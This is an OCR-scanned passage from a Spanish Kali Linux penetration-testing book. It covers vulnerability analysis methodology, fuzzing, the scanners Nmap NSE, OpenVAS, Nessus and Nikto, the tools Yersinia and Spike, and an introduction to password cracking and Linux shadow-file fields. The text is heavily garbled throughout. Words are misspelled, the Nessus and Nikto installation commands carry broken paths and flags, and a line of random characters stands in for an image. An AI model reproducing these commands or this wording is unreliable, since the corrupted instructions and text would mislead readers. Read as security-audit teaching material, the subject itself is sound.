maneras  distintas:  la  correlacion  espedfiea  y  la  correlacion  categdrica.  Ambas  son  utiles  en  fund  on 
del  tipo  dc  informacidn,  metricas  y  estadfsticas  que  se  esten  intentando  obtener  de  un  objetivo 
detenu  inado. 


La  correlacion  espedfiea  hace  referenda  a  una  debilidad  concreta  definida  en  varies  listados  con  el 
ID  de  la  vulnerabilidad,  (entre  estos  IDs  destacan  el  CVE,  cl  OSVDB,  y  el  indice  personalizado  dc 
cada  proveedor),  esto  cs  un  problema  conocido  en  un  delerminado  software.  Dichos  identificadores 
de  vulnerabilidades  puede n  scr  agrupados  en  aspectos  como  el  nombre  del  cquipo,  la  direccion  1R 
el  FQDN,  la  direccion  MAC,  etcetera,  Un  ejemplo  de  esto  resultaria  al  agrupar  las  vulnerabilidades 


Capitulo  ///.  Analisis  de  vulnerabilidades  y  a! agues  de  contrasenas 
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L>iu'ontradas  en  microfactores  como  d  host  en  el  que  han  sido  halladas  y  d  codigo  CVE  asignado  a 
vulnerabilidad,  De  hecho  muchos  escaneres  de  vulnerabilidades  ofrecen  esta  posibilidad  para 
la  presen tacidn  de  los  result  ados. 

l^a  correlacion  categories  hace  referenda  a  aspectos  re  I  aci  on  ados  con  estructuras  de  categorias, 
como  en  el  case  de  los  marcos  de  cumplimienlo  (por  ejemplo,  NIST SP  800-53,  DoD  5300  Series, 
PCI  bllPPA,  guia  OWASP *  etcetera),  que  permite  agrupar  los  elementos  en  macro t adores  como  el 
tjp0  je  \ulnerabdidad,  errores  de  configuracidn,  etcetera.  Un  ejemplo  de  este  tipo  de  correlacion 
erja  asnipar  todos  los  equipos  encontrados  con  credenciales  por  defecto  en  el  grupo  que  evalua  la 
complejidad  de  las  contrasenas  dentro  de  NIST 800-53  (JA-5). 

En  base  a  los  dos  estiios  de  correlacion  presentados,  sc  hace  necesario  insistir  en  la  importancia 
de  que  un  enfoque  centrado  en  demasia  en  microfactores  podria  ofrecer  una  sensacion  de  riesgo 
exagerada,  mientras  que  otro  que  lo  haga  exelusivamente  en  los  mac rofac tores  podria  dar  la  falsa 
sensacion  de  bajo  riesgo. 


Pruebas  mammies  especificas  a  cada  protocolo 

Tal  y  como  se  pudo  observar  en  la  fase  de  foot  printing,  cada  protocolo  necesita  una  herramienta 
disenada  expresame  nte  para  el  mismo,  un  ejemplo  de  los  protocoled  mas  comunes  a  la  bora  de 
re&tizar  el  analisis  de  vulnerabilidades  son: 

t .  -  Servicio  VPN:  El  analisis  de  este  protocolo  permit  ir4  determ inar  debilidades  tales  como 

el  use  de  claves  precompartidas  o  un  ID  de  gmpo  por  defecto. 

Servicio  Citrbc:  El  analisis  permitira  evaluar  la  posibilidad  de  enumerar  e!  directories  de 
usuario  de  la  organizacion. 

-  Servicio  DNS:  Del  misnio  modo,  la  trausferencia  de  zona  se  puede  considerar  tanto 
parte  del  proceso  de  recogida  de  informacion  como  una  vulnembilidad  derivada  de  una  mala 
configuraeidn  en  los  servidores  DNS. 

Servicios  Web:  En  multiples  oeasiones  es  posible  acceder  a  un  mismo  servicio  web  desde 
varios  puertos  en  un  mismo  sistema,  sin  embargo  muchos  administradores  de  sistemas  solo 
ponen  su  esfuerzo  en  asegurar  aqudlos  que  corren  por  los  puertos  mas  comunes. 

Servicio  SMTP:  Los  servidores  de  correo  pueden  ser  vulnerables  tanto  a  tecnicas  de 
cnumeracion  de  usuarios  como  a  suplantacidn  de  los  mismos  mediante  tecnicas  de  SPAM  o 
tecnicas  de  fuerza  bruta  contra  la  interfaz  web, 


Vectored  de  ataque 

*  a  ^^cesidad  de  documentor  el  progreso  de  explotacidn  de  las  vulnerabilidades  asegurfridosc  de  no 
tlcscuidiir  ningun  vector  de  ataque  y,  al  mismo  tiempo  de  evitar  danar  la  infraestructura  a  auditor, 
obliga  a  seguir  una  serie  de  pautas: 

Elaborar  arboles  de  ataque  resulta  crucial  para  asegurar  la  precision  del  in  forme  final.  El 
arbol  debe  ser  desarrollado  y  actual  izado  con  forme  se  analizan  nuevos  sistemas  y  servicios. 
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y  se  identifican  vru Jntrrahi liciades  potenciales.  Esto  results  especialmente  im  porta  nte  durante 
las  fascs  tie  explotactdn, 

*  Las  pniebas  en  un  laboratorio aislado,  que constituya una  replica  del  entorno  real,  permiten 
neuiralizar  el  impacto  de  la  ejecueion  de  los  exploits  y  a!  mismo  tiempo  asegurar  con  cierto 
grade  de  certeza  cl  impacto  que  dicha  vulnerabilidad  podria  suponer  a  la  organ  tzacidn. 

-  Aunque  las  pautas  anteriores  sean  neeesarias,  al  final  siempre  results  imprescindible  la 
confirmation  visual  en  el  sisicma  de  destino  de  manera  que  sc  certifique  la  existeneia  de 
dicha  vulnerabilidad,  ' 

Investigation 

Investigation  publics 

Tras  la  identification  de  una  vulnerabilidad  en  uno  de  los  host  objettivo,  es  necesario  concretar  la 
graved  ad  de!  problerna.  En  muclios  casos,  dicha  vulnerabilidad  puede  encontrase  en  un  paquete 
de  software  tie  eodigo  fibre,  y  en  otros,  puede  ser  utia  debilidad  en  un  proceso  de  negocio,  o  un 
error  administrative)  comirn  como  una  mala  configuracidn  o  uso  de  contrasefias  por  defecto,  Estas 

vulnerabilidades  generafmente  vienen  detail adas  en  bases  de  dates  de  vulnerabilidades  y/o  en  avisos 
de  proveedores. 

Bases  de  datos  de  exploits  y  mod u los  de  frameworks 

Muchas  de  las  vulnerabilidades  conoeidas  tienen  exploits  tie  disponibilidad  publica  asociados.  Estos 
exploits  pueden  sci  encoiih ados  en  di  versus  paginas  webs  que  contienen  bases  de  datos  con  los 
exploits  categorizados  en  I uncion  de  la  plataforma,  del  vector  de  ataque,  de  sus  conseeuencias,  del 
identificador,  etcetera, 

Del  mismo  modo,  existen  frameworks  espeeializados  en  la  explotacidn  de  vulnerabilidades,  (dentro 
de  los  euales  desiaca  Metasploii ),  que  disponen  de  um  base  de  exploits  que  se  sincromza  con  sus 
servidores  y  queda  almacenada  en  el  equipo. 

Contrasefias  por  defecto 

Con  freeuencia,  los  administradores  y  tecnicos  eligen  contrasefias  debiles,  no  cambian  la 
configuracion  por  defecto  o  sencillamente  no  establecen  ninguna  contrasefia  para  acceder  al  servicio. 
En  foros  de  Iniemet  y  a  t raves  de  correos  directos  al  vendedor  se  puede  encontrar  documentacidn 
subie  credenciales  de  uso  comun  o  la  existeneia  de  cuentas  mal  configuradas. 

<  lulu  de  tortificacifin  /  Errores  de  configuracldn 

I  as  guias  de  fort  ilicac  ion  pueden  servir  de  referenda  al  auditor  para  com  pro  bar  la  existeneia  de 
nulas  configupacioncs  o  detecta r  las  panes  mas  debiles  de  un  sistenia,  Ademas  en  determ inados 

toros  puede  encontrarse  inform  acidn  valiosa  sobre  puntos  criticos  y  fallos  comunes  a  la  hora  de 
real  tzar  la  configuracion  del  sistema. 


Cap'ttulo  HI.  Anahsis  da  vidnerubilidades  y  ataques  de  contrasenas 
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Configurar  una  Replica  de  Fntorru* 

Gracias  a  las  tecnologias  de  virtual izacidn  es  posible  que  un  investigador  de  seguridad  ejecute  una 
;u . ,p|ia  variedad  de  sistemas  operatives  y  aplicaciones,  sin  la  necesidad  dc  recurrir  a  un  hardware 
dedieado*  Cuando  se  identifier  una  aplicacidn  o  sistema  objetivo  se  puede  recurrir  al  uso  dc  una 
inaquina  virtual  ( VM  )  para  reercar  el  entomo  del  objetivo.  El  analista  puede  util  tzar  csla  miquina 
virtual  para  explorar  parametros  dc  configuration  y  el  comportamiento  de  la  aplicacidn,  sin  necesitar 
una  eonexion  di recta  con  el  objetivo. 

Probar  eonftguraciones 

Un  laboratorio  de  pruebas  de  maquinas  vktuales  debe  poseen  un  almaceti  con  imageries  de  todos 
tos  sistemas  operatives,  mcluyendo  tanto  el  sistema  operativo  como  cada  una  de  las  revisiones  (por 
ejemplo  podria  ser  Windows  XP,  XP  SP1 ,  XP  SP2,  XP  SP3f  Vista f  Vista  SPL  7,  etcetera)  de  cara 
a  agilizar  el  proceso  de  preparation  del  entomo  de  pruebas.  Recurrir  a  la  donation  y  al  uso  de  !a 
funcion  de  instantaneas  permitira  trabajar  de  inanera  mas  cficicnte  y  reproducir  errores. 

Fuzzing 

E I  proceso  dt  fuzzing,  o  inyeccidn  de  fa  1  los,  es  una  tecnica  de  tiierza  bruta  para  encontrar defectos  en 
la  aplicacidn  mediante  el  procedimiento  de  probar  datos  de  entrada  va  lidos,  aleatorios  o  inesperados 
en  la  aplicacidn.  El  proceso  bisico  consiste  en  adjuntar  un  depurador  a  la  aplicacidn  de  destine 
v,  a  continuation,  ejecutar  la  rulina  de  fuzzing  contra  areas  especificas  dc  entrada  de  datos,  para 
luego  analizar  el  estado  del  programa  despues  de  cualquier  fallo  que  se  produzca,  Existen  multiples 
aplicaciones  para  realizar  cste  proceso,  sin  embargo  tambien  resulta  comun  que  los  investigadores 
p  ro  gr a m en  s  us  pro  p  i  os  fuzzers , 


Identification  de  posihles  vias  /  vectores 

Inieiar  sesion  o  conectarse  a  una  aplicacidn  en  la  red  objetivo  puede  pennitir  identifier  comandos  y 
otras  areas  de  acceso.  Sid  destine  es  una  aplicacidn  de  escritorio  que  lee  archives  y/o  paginas  web, 
se  deben  analizar  los  formatos  de  archivo  admitidos  para  los  puntos  dc  entrada  dc  datos.  Atgunas 
pruebas  muy  send  lias  incluyen  el  uso  de  caracteres  no  va  lidos  o  cadcnas  de  caracteres  muy  largas 
que  puedan  causar  un  fallo.  En  caso  de  existir,  el  siguiente  paso  consisliria  en  adjuntar  un  depurador 
para  analizar  el  estado  del  programa. 


Descompilar  y  analizar  el  eddigo 

Algunos  lenguajes  de  programacion,  como  los  basados  en  .Net,  permiten  la  descompilacidn  y  algunas 
aplicaciones  especificas  son  compiladas  con  cierla  simbologia,  que  permite  posteriormente  ayudar 
a  I;|  depuracidn.  Un  investigador  debe  aprovecharse  de  estas  caracteristieas  para  analizar  el  flujo  del 
programa  e  identilicar  posibles  vulnerabilidades.  El  codigo  fuente  de  aplicaciones  de  eddigo  abierto 
tatnbien  debe  ser  analizado  en  buses  de  defectos.  Las  aplicaciones  web  escritas  en  PHP  suelen 
compart! r  rrmchas  de  las  mismas  vulnerabilidades.  y  su  codigo  luente  debe  ser  examinado  como 
Parte  de  cualquier  prueba. 
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3.  Analisis  con  Kali 

Muchas  de  las  hciramiemas  disponibles  cn  Kali,  (que  ya  has  sido  explicadas  en  cl  capitulo  relativo 
a  la  last?  de  recogida  de  informacidn),  tambien  deleclan  al  niismo  liempo  posiblcs  vulnerabilidades. 
Dchido  a  que  en  esle  libro  se  dcdica  un  capitulo  entero  a  la  fase  de  audiloria  web,  donde  se  analizan 
las  poKibles  vulnerabilidades  de  este  tipo,  se  mostrara  en  esta  section  la  utilizacidn  de  herramientas 
de  analisis  de  vulnerabilidades  genericas. 


Nmap  +  NSE  ] 

El  motor  de  scripting  de  Nmap  (Nmap  Scripting  Engine),  es  una  de  las  caracteristicas  mas  potentes 
y  flexibles  de  Nmap,  Permite  a  los  usuarios  escribir  sencillos  scripts  para  automatizar  una  ainplia 
variedad  de  tareas  de  red.  Estos  scripts  son  ejecutados  en  paralelo  con  la  velocidad  y  eficiencia 
esperada  de  Nmap. 

El  NSE  ha  sido  disenado  para  ser  versatil,  con  las  siguientes  tareas  en  menle;  1 

Descubrimiento  de  red:  Los  ejemplo  incluyen  la  busqueda  en  who  is  basado  en  el  dominio, 
consultas  ARIN,  RIPE  oAPNIC  a  travti.  dc  la  direction  IP  para  detemiinarel  duefio,  ejecutar 
busqucdas  identd  para  encontrar  puerto  abtertos,  consultas  SNMP,  y  Hstado  de  servicios  y 
directories  disponibles  en  protocol  os  como  pueden  ser  NFS  o  SMIi.  3 

-  Deteccidn  de  versiones  mas  sofisticada:  La  deteccion  de  la  version  de  un  determinado 

servicio  no  siempre  puede  ser  Nevada  a  cabo  a  Irnves  del  banner  del  mismo,  muchas  veces 
resulta  necesario  realizar  otras  pruebas  independientes,  como  por  ejemplo  en  el  caso  de  Skype 
v2.  Nmap  ademas  es  capaz  de  intentar  obtener  informacidn  de  los  servicios  SNMP  probando 
por  fuerza  bruta  un  listado  de  mas  dc  cien  nombres  de  comunidades.  Ninguno  de  los  ejemplos 
anteriores  puede  ser  llcvado  a  cabo  mediante  el  1  un cio namiento  normal  de  Nmap  pero  si  con 
NSE.  1 

-  Deteccion  de  vulnerabilidades:  Cuando  una  nueva  vulnerabilidad  es  descubierta,  a 
menudo  puede  ser  recomendable  escanear  sus  redes  en  busca  de  si  stomas  vulnerables  antes  de 
que  un  posibte  atacante  lo  haga.  Aunque  Nmap  no  intenta  ser  un  escaner  de  vulnerabilidades. 
NSE  es  lo  suficientemente  potente  como  para  gestionar  la  comprobacion  de  vulnerabilidades. 

-  Deteccion  de  puertas  traseras:  Mucbos  atacantes  y  algunos  gusanos  aulomaticamente 

dejan  puertas  traseras  para  permitir  una  futura  visila.  Algunas  de  estas  pueden  ser  detectadas 
mediante* la  busqueda  regular  de  deteccion  de  versiones.  Mientras  que  otras  requieren  el 
desarrollo  de  un  pequeflo  script  con  el  NSE.  V 

-  Explotacidn  de  vulnerabilidades:  Como  todo  lenguaje  de  scripting,  NSE  ineluso  puede 
ser  usado  para  explotar  vulnerabilidades  ademas  de  encontrarlas.  La  capacidad  de  atladir 
exploits  personal izados  puede  resultar  tin  ahadido  para  algunas  personas  (particularmente 
penetration  testers),  aunque  como  ya  se  ha  comentado  anteriormente  el  objetivo  de  Nmap  no 
es  convertirse  en  algo  similar  a  Metasploit. 
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Cnptiuio  III.  AnalisLs  de  vultterab/iidades  v  at  agues  de  contrasenas 

Adeniss  tie  estas  caracterlsticas,  el  equipo  dc  Nntap  confia  en  la  capacidad  de  inventiva  de  los 
usuarios  para  que  sean  capaees  de  aumentar  sus  posibilidades. 

Para  ejeeutar  el  motor  de  NSE  con  los  scripts  que  posee  dc  serie  Nmap  es  suficienle  con  anadir  el 
parAmetro  “-s C"  a  los  argumentos  de  entrada  de  la  herramienta. 

■ 

OpenVAS 

Open  VAS  (Open  Vulnerability  Assessment  System),  inicialmente  fue  denoniinado  GNessUs  por  sei 
una  adaptation  de  la  version  de  software  libre  de  Nessus. .  Esto  fue  hasta  el  aflo  2005,  justo  antes  de 
deiar  de  ser  software  libre.  Sc  trata  dc  una  suite  de  software,  que  ofrecc  un  marco  de  trabajo  disenado 
para  integrar  servicio  y  herramientas  especializadas  cn  el  escaneo  y  gestion  de  vulnerabilidades  de 

sistemas  informaticos. 

La  version  actual  pennite  la  actualizacion  continua  de  la  base  de  pruebas  de  vulnerabilidades  de  red, 

\  a  cada  una  de  estas  pruebas  se  las  conoce  como  NVT  por  sus  siglas  en  ingles),  y  actual  m cute  posce 

cerca  de  30000  NVT* 

En  Kali  se  ha  auloinatizado  gran  parte  del  proceso  de  configuracion  y  preparacion  del  servicio 
OpenVAS.  Sin  embargo  aun  resulta  necesario  seguir  una  serie  de  pasos: 

*  Ejeeutar  open  va$ -setup:  Este  comando  se  encarga  de  realizar  la  configuracion  inicial, 
descargar  la  base  de  datos  de  los  NVT  y  crear  la  cuenia  del  usuario, 

-  Ejeeutar  openvas-gsd:  Este  comando  pennite  acceder  al  panel  de  control  grafieo  dc 
OpenVAS.  Tras  realizar  este  acceso,  hay  que  introducir  los  campos  relatives  a  la  IP  dc 
servidor  (hcalhost),  usuario  y  contrasefia.  AI  introducir  la  IP,  generalmente,  aparecera  una 
ttX”  roja  indicando  problemas  de  conexidn,  pero  tras  un  breve  periodo  de  tiempo,  si  todo  se 
ha  desarrollado  correctamente  aparecera  una 

-  Acceder  al  gestor  web:  Desde  el  panel  de  control,  y  de  mariera  directa,  es  posible  acceder 
a  un  panel  de  administration  y  consulta  de  los  intonnes  mas  amigablc.  Sin  embargo  en  la 
version  actual  de  Kali  dicho  acceso  no  parece  funcionar  correctamente  y,  pese  a  iratarse  de 
un  acceso  en  local,  la  carga  se  realiza  de  manera  muy  lenta. 

Una  vez  en  el  panel  de  administration  hay  que  definir  el  objelivo  a  auditar,  cl  range  de  puertos  y  la 
agresividad  de  las  pruebas,  en  lo  que  se  considera  una  nueva  tarea.  Posieriormentc  seleccionando 
sohre  la  tarea  se  escoge  la  option  iniciar  y  solo  restaria  esperar  a  la  finalization  del  escSner  y 

cstudiar  los  resultados, 


Nessus 

‘)f-  bata  de  un  escaner  dc  vulnerabilidades  similar  a  OpenVAS,  en  parte  a  que  comparten  el  mismo 
0|igen.  de  caracter  propietario,  desarrollado  por  Tenable  Network  Security*  Gratuito  para  uso 
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personal  y  entomos  no  corporative®.  Su  objetivo  es  detectar  vuinerabilidades  potencies  en  ios 
sistemas  a  auditar. 


Nessus  no  viene  de  serie  en  Kali,  sin  embargo  debido  a  quo  tieue  una  interfaz  mucho  mds  potentc, 
a  quo  es  el  escaner  de  preferencia  de  muchos  auditores  de  seguridad  y  a  que  Open VAS  tambien 
necesita  unos  pasos  previos  para  ser  utilizado,  se  ha  considerado  oportuno  explicar  su  proceso  de 
instalacidn  en  Kali  asi  como  diversos  aspectos  interesantes,  que  son  la  preparation  del  perfil  mas 
agresivo"  y  la  integracion  de  Nikto  en  la  herramienta, 

El  procedmuento  a  segutr  para  instalar  y  pasar  a  utilizar  Nessus  en  Kali  serfa  el  siguiente: 

*  De&eargar  la  version  adecuada  de  Nessus  para  Debian  6.0 


Desempaquetar  el  paquete  Debian.  Para  ello  se  escriben  Ios  siguientes  comandos  en  consola; 

dJ  /imp/ 

-  ar  vx  Nessus  -5.  ft  3 -debian  6  * 


tar  -xzvf  data,  tar.  gz 

-  tar  -xzvf  control.  targz 

Esto  generara  las  carpetas  y  “opt" 

Copiai  las  carpetas  localizadas  en  twtp/opi^  al  directorio  /opt,  (si  no  existe  dicho  directorio 
habria  que  erearlo).  A  continuaeion  se  escribirian  en  consola  Ios  siguientes  comandos: 

-  mkdir  /apt 

-  cp  -Rf /tmp/opt /nessus  /opt 

-  cp  -Rf  ftmp/etc/iniLd/nessus  *  fetc/initd 

A  partir  de  este  momento  ya  se  podran  eliminar  Ios  archivos  que  queden  en  la  carpeta  /trap. 

*  Arranear  Nessus  desde  un  terminal,  y  escribir  en  consola  el  siguiente  coniando: 

-  / etc/ini  f.  d/ness  us  d  s  tan 

*  Abrir  Iceweasel  y  navegar  a  la  direccion  https://127.0dU : 883 4.  La  prim  era  vez  que  se 
acceda  a  Nessus  sera  necesario  conseguir  una  Hcencia  de  uso  gratuilo. 


Nessus  Perlil  Agresivo 


A]  igual  que  el  resfo  de  eseaneres  de  vuinerabilidades  hay  ciertas  opciones  deshabiliiudas  en  todos 
lus  per  lit,  - 1  '  su  agresividad  o  por  tratarse  de  caraeteristicas  experimentales.  En  base  a  ello  hay  una 
serie  de  caracteristieas  a  considers  si  se  desea  evaluar  la  cfectividad  de  log  dislintos  eseaneres  Si  el 
uitujno  a  evaluar  no  es  de  produce  ion  pod  da  ser  recomenduble  revisar  las  siguientes  caractedsticas 


(  omprobaciones  seguras:  Nessus  liace  lo  posible  para  no  causar  efectos  adversos  en 
los  sisienias  y/o  red  audit  ad  a,  Por  ello,  la  ope  ion  de  comprobaciones  seguras  se  encuentra 
habilitada  en  todas  las  politicas  de  escaneo  que  vienen  por  defecto.  Las  comprobaciones 
seguras  cambian  el  comportamiento  de  cientos  o  mis  plugins. 


£  ^pjtttlo  IJL  Andlisis  de  vulnerabilidades y  a  tag  lies  de  corurasenas 


Pruebas  exhaustivas  (lento);  C  ausa  que  varios  plugins  actueii  mas  agresivos  y  penetren 
mas  profundamente  en  el  sistema  para  detectar  la  vulnerabilidad  y  expandir  el  objetivo  de 
la  busqueda  para  la  citada  vulnerabilidad.  Por  ejemplo,  cuando  busca  archivos  compartidos 
mediante  SMB,  el  plugin  analizara  tres  niveles  de  prol'undidad  en  lugar  do  uno  solo. 

-  Scripts  experimentales:  Esta  opcion  habilita  los  plugins  experimentales,  con  ello  ciertos 
plugins  ademas  ganaran  alguna  funcionalidad  adicional. 

-  Seguir  enlaces  dinamicos:  Le  indica  a  Nessus  que  utilice  el  Spider  en  cada  sitio  web 
que  encuentre,  anadiendo  las  entradas  a  la  base  de  conocimiento  para  que  otros  plugins 
encuentren  vulnerabilidades  en  dichos  sitios. 

-  In  forme  Paranoia:  Esta  opcion  hara  que  el  in  forme  muestre  mucha  mas  information 
aunque  con  la  consecuencia  directa  de  un  incremento  de  falsos  positivos. 


Probar  scrvicios  basados  en  SSL:  Cuando  se  configura  para  Todos  ,  cada  servicio  sera 
probado  para  buscar  capacidades  SSL. 

-  Credenciales:  Ahade  la  posibilidad  de  usar  credenciales  de  manera  que  sea  posible  realizar 
ciertas  comprobaciones  para  aumentar  la  certeza  de  las  vulnerabilidades  descubiertas. 


En  base  a  lo  anteriormcnte  comcntado,  Paul  Asadoorian,  un  trabajador  del  equipo  de  tenable  en 
su  blog  de  pauklotcom.com  analiza  estos  parametros  y  permite  la  desearga  tie  un  perfil  con  estos 

parametros  ya  ajustados, 


Nessus  +  Nikto 

El  equipo  de  Tenable  en  un  aitfculo  del  aflo  2010  comenta  el  procedimiento  a  seguir  para  integrar 
Nikto  a  modo  de  plugin  en  Nessus.  El  procedimiento  complete  a  seguir  seria  el  siguiente; 

•  Descargar  Nikto  e  instalarlo,  para  ello  ejecutar  los  siguientes  comandos- 

-  wget  http://cirt,  net/nikta/nikto-2.#.  #.  tar.gz  (escoger  la  ultima  version  existente) 

tar  zxvf  nikto- 2.  #.  #.  tar.gz 

•  Ejecutar  los  siguientes  comandos  como  root: 

mkdir  bpt/nikto 

-  cp  -r  *  /opt/nikto 

•  Modificar  bptiniktQkmkto.pl  y  cambiar  la  localizacion  del  archive  de  configuracion 

-  SNIKTOfconfigfile  ’}  =  “iopt/nikto/nikto.conf; 

•  Anadir  la  siguiente  linea  a  /etc /profile  y  actual  szar  el  PATH  del  sistema  para  que  incluya  nikto 

[  .  export  PATH=$PATH:  /opt/nikto:/opt/nessus/bin:bpt/nessus/sbin 

•  Recompilar  y  reindexar  los  plugins  de  Nessus: 

-  bpt/nessus/sbin/nessud  -R 

•  Final  mente  reiniciarAfeyj'Hs: 

-  /efc/init.d/nessusd  restart 
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Escaner  activo  de  Burp  Suite  „■! 

Esta  herramienta  sera  comentada  en  profimdidad  en  el  eapitulo  de  anaiisis  de  vulnerabilidades 
web.  Sin  embargo,  es  precise  comentar,  al  igual  quo  so  hizo  con  Nikto ,  la  poleneia  qne  ofrece  la 
combination  generada  por  las  utilidades  de  Spider  y  el  escaner  activo  de  Burp  Suite.  Mientras 
quo  Nikto  posee  ima  serie  de  plugins  que  prueban  la  existencia  de  detenu inados  elementos  o 
determinadas  direcciones  URL,  Burp  Suite  es  capaz  de  recorrer  todos  los  enlaces  de  tin  determinado 
sitio  web  realizando  una  inmensa  baleria  de  pruebas  capaz  de  deteetartodo  tipo  de  vulnerabilidades 
web  o  de  malas  configuraciones.  Obviamente  fiinguna  herramienta  es  capaz  de  deteclar  por  si  sola 
vulnerabilidades  asociadas  con  la  logiea  de  negocio  de  las  aplicaciones,  y  generar  un  infomie  muy 
detallado  sobre  el  tipo  de  vulnerabilidad  encontrada.  information  sobre  ia  misma  y  resaltando  el 
punto  exactu  de  inyeccion. 


Yersinia 

Yersinia  es  una  herramienta  de  red  disenada  para  tomar  ventaja  de  determinadas  vulnerabilidades 
en  diferentes  protocol  os  de  red.  Pretende  ser  un  marco  solido  para  analizar  y  pro  bar  las  redes  y 
sistemas.  'i 

Actualmente  sc  encuentran  implementados  ciertos  protocolos  de  red,  antique  el  autor  de  la 
herramienta  afirma  que  la  compatibilidad  con  otros  sc  encuentra  en  cam i no  y,  al  niismo  tiempo. 
anima  al  desarrollo  de  mas  modules  por  parte  de  la  coin  uni  dad.  I  .os  protocolos  actualmente 
soportados  son  los  siguientes: 

Spanning  Tree  Protocol  (STP).  fl 

C  is  co  Disco  very  Pro  toco!  ( CD  P ) . 

-  Dynamic  Trunking  Protocol  (DTP),  j 

Dynamic  H os f  Configuration  Frame o I  (DHCP). 

-  Hot  Standby  Router  Protocol  (HSRP),  a 

-  IEEE  802, IQ  I 

-  IEEE  802.  IX 

Inter-Switch  Link  Protocol  (1SL). 

Vlan  Trunking  Protocol  (VTP).  1 


Spike 

Para  acabar  la  section  de  lierramientas  incluidas  en  Kali  para  el  analisis  de  vulnerabilidad,  hay 
que  hacer  mencion  a  una  serie  de  herramientas  de  fuzzing  incluidas  en  Spike.  Spike  es  una  API 
basada  en  GPL  y  un  conjunto  de  herramientas  que  permite  near  rapidamente  las  llamadas  “'pruebas 
de  estres  sobre  un  determinado  protocol o.  Dichas  pruebas  eonsisten  en  lanzar  muehas  peticiones 
especial  es  a  un  protocolo,  a  la  espera  de  que  este  genere  un  uomportamiento  anorrmlo,  que  pueda  ser 
poster!  ormenle  estudiado  y  explotado. 
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p|  leiiguiijt’  de  scripting  usado  eti  Spike  es  C  y  como  tal  el  script  a  desarroliar  para  preparar  la 
,|ia  de  estres  sob  re  el  protocolo  conslituira  un  pequefto  program  que  se  cargara  desdi* *  linea  de 

comandos. 

l>;ira  entender  mejor  el  funcionamiento  de  la  herramienta  y  ver  como  se  realizan  pruebas 
personal  izatl  as  de  estres  sob  re  los  protocols,  rcsuita  recomendable  ver  la  presentacion  que  se  liizo 
en  sli  memento  acerca  de  la  herramienta,  datada  en  el  afio  2002:  http://wwwjmmunitysec.cotH/ 

resources-papers.  shtml. 


4.  Ataques  a  contrasenas  en  Kali  Linux 

El  LLS0  de  contrasenas  se  remonta  a  la  antiguedad  cuando  un  sitio  era  protegido,  y  alguien  intentaba 
acceder  a  el  sc  le  solicitaba  cl  «santo  y  sena»*  Solamente  la  persona  que  conocia  la  contrasena  era 
la  que  podria  pasar,  En  la  actuaiidad.  las  contrasenas  son  utiilzadas  por  k>  general  para  controtar 
d  aeceso  a  sistemas,  equipos,  lelefonos  moviies,  instalaciones,  cajeros  automaticos,  etcetera.  A 
su  vez  dichos  dispositivos  puede  hacer  uso  de  contrasenas  para  diferentes  propositos,  incluyendo 
conexiones  a  cuentas  de  usuario,  correo  electron tco,  bases  de  datos,  redes,  aplicaciones,  etc.  Es  d 
medio  dc  autenticacidn  y  pmteccion  mas  utilizado  en  la  actuaiidad  para  casi  todo,  lo  que  lo  hace  um> 
dc  los  principals  objetivos  a  alacar  cuando  se  quiere  teller  acceso  a  aigo. 

Los  ataques  a  contra&eflas  o password  cracking  no  son  mas  que  lodas  aquellas  tecnicas  orientadas 
a  romper  o  dcscifrar  contrasenas  utilizadas  para  proteger  sistemas,  aplicaciones  o  documentos.  Es 
import  ante  tener  en  cuenta  que  todo  meeanismo  de  autcnticacion  por  contrasenas  lo  que  realiza  es 
una  comparacion  del  hash  de  las  contrasenas  establccidas  para  protegerlos,  con  cl  generado  por  la 
contrasena  introducida. 


b n  hush  es  una  cadena  de  longitud  fija  de  va  lores  al  fanumericos,  y  en  algunos  casos  se  usan  caracteres 
especiales  como  o  que  se  suele  obtener  al  aplicar  una  funcion  hash  a  un  texto  piano.  La 

idea  basica  de  un  hash  es  que  sirva  como  una  represen tac ion  compacts  de  la  cadena  de  entrada,  es 


por  eso  que  tambien  es  conocida  como  ^funcion  resumerT.  Dicha  “funcion  resumerT  tarn  hi  en  es 
utilizada  para  proteger  las  contrasenas  almacenadas  en  sistemas  que  requieren  autenticacion. 


'  y  2R1  rid  V.% tMlhluST  7W2Q6n^ug6 „ 3]  aac  3t0xltnit^i2ENUY .  GXsSK /STEbLJ  QH2*Vr  2z48i  a j  r gy  MV7C  &7rvHlpFaY  NSI  | :  15S 1 0 :  Q :  ^1*999:7  ,  jT: 
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Iniagcn  03*05:  Almaoenamienio  de  hash  en  sistemas  GNU/LINUX, 


la  iniagen  anterior  muestra  como  son  almacenadas  las  contraseflas  en  un  sistema  GNU /Linux.  Cada 

*nea  especifica  los  us  u  art  os,  sus  contraseflas  protegidas  y  las  diferentes  poll  lie  as  que  se  aplican 
suhre  las  contrasefias  de  dicho  usuario,  El  contenido  de  cada  una  de  las  1  ineas  es  el  siguienle: 

E  El  nombre  de  usuario. 

’■  Li  algoritmo  de  resumen  utilizado. 


n 


Pentesting  con  Kali 


3.  El  salt  de  la  contrasefia, 

4.  La  contrasefta  cifrada.  Este  es  et  hash  de  la  emitrasefta  almacenado  y  el  que  $e  utiliza  para 
comparar  y  poder  autenticar  al  usuario. 

5.  Los  dias  iraseurridos  desde  el  I  de  enero  1970  hasta  ef  dia  en  que  la  contraserla  fue  cambiada 
por  ultima  vez. 

6.  El  numero  minimo  de  dias  requerido  para  poder  cambiar  la  contra&efla.  1 

7.  LI  numero  maxi  mo  de  dias  que  la  eontrasena  es  valida.  Una  vez  transeurridos  dichos  dias.  el 

usuario  se  vera  obligado  a  cambiar  la  contrasefia,  j 

8.  El  numero  de  dias  antes  de  que  expire  la  contra  sefia*  durante  los  euales  el  usuario  es  advertido 
de  que  debe  ser  cambiada. 

9.  El  numero  de  dias  que  debe  trascurrir  despues  de  que  caduque  la  contrasefia  para  que  la 

cuenta  sea  deshabilitada.  I 

10.  El  numero  dc  dias  desde  el  l  de  enero  de  1970  en  que  la  cuenta  estara  deshabilitada  o  habra 
expirado. 

Por  lo  general  en  lodos  los  sistemas  conocidos  estos  datos  son  almacenados  de  una  manera  similar. 
Dentro  de  los  hash  mas  conocidos  se  eneuentran;  m 

*  MD5 ;  Comunmente  utilizado  en  algunos  sistemas  UNIX y  GNU/Linwc  mis  antiguos  que  los 
actuates,  tambidi  se  sigue  utilizando  en  algunos  loros  y  (  MS  como  WordPress,  o  Joomta.  Esie 
hash  es  representado  tipicamente  como  un  conjunto  de  32  digitos  hexadecimal.  La  debilidad  de 
este  hash ,  (como  en  todos  los  algoritmos  de  resumen),  son  las  colisiones.  Una  colision  de  hash 
